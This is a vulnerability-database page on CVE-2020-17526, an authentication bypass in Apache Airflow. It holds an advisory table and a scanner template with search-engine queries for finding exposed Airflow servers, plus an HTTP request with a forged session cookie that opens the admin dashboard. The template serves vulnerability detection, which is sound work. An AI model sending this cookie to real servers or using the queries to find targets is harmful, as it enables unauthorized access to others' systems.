| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| The default installation configuration “[webserver] secret_key” of the Airflow data processing software’s creation, monitoring, and orchestration tools makes it possible for a malicious individual to gain unauthorized access to an external web server. | 27 Jul 202200:00 | – | bdu_fstec | |
| CVE-2020-17526 | 6 Apr 202409:56 | – | circl | |
| Apache Airflow Webserver 安全漏洞 | 21 Dec 202000:00 | – | cnnvd | |
| Apache Airflow Webserver Unauthorized Access Vulnerability | 22 Dec 202000:00 | – | cnvd | |
| CVE-2020-17526 | 21 Dec 202016:45 | – | cve | |
| CVE-2020-17526 | 21 Dec 202016:45 | – | cvelist | |
| Multiple vulnerabilities in Apache Airflow | 7 Jun 202200:00 | – | fortinet | |
| Incorrect Session Validation in Apache Airflow | 20 Apr 202116:40 | – | github | |
| Vulnerability fixed in Fortinet products | 8 Jun 202200:00 | – | ncsc | |
| CVE-2020-17526 | 21 Dec 202017:15 | – | nvd |
id: CVE-2020-17526
info:
name: Apache Airflow <1.10.14 - Authentication Bypass
author: piyushchhiroliya
severity: high
description: |
Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized execution of arbitrary code.
remediation: Change default value for [webserver] secret_key config.
reference:
- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
- https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
- http://www.openwall.com/lists/oss-security/2020/12/21/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
- https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2020-17526
cwe-id: CWE-287
epss-score: 0.23336
epss-percentile: 0.97504
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: apache
product: airflow
shodan-query:
- http.title:"airflow - dags" || http.html:"apache airflow"
- http.title:"sign in - airflow"
- product:"redis"
fofa-query:
- Apache Airflow
- apache airflow
- title="airflow - dags" || http.html:"apache airflow"
- title="sign in - airflow"
google-query:
- intitle:"sign in - airflow"
- intitle:"airflow - dags" || http.html:"apache airflow"
tags: cve,cve2020,apache,airflow,auth-bypass,vuln
http:
- raw:
- |
GET /admin/ HTTP/1.1
Host: {{Hostname}}
- |
GET /admin/ HTTP/1.1
Host: {{Hostname}}
Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'Redirecting...')"
- "status_code_1 == 302"
condition: and
- type: word
part: body_2
words:
- "DAG"
- "Recent Tasks"
- "Users"
- "SLA Misses"
- "Task Instances"
condition: and
# digest: 4b0a00483046022100a69f75a2b1895909015224cc3eba93bdf99e4cff439d6fe33cd6f438d447b6cb0221009827702b93553ac8eede8779c520614d14a649a6e6a3bc0a9625268f74da9e33:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation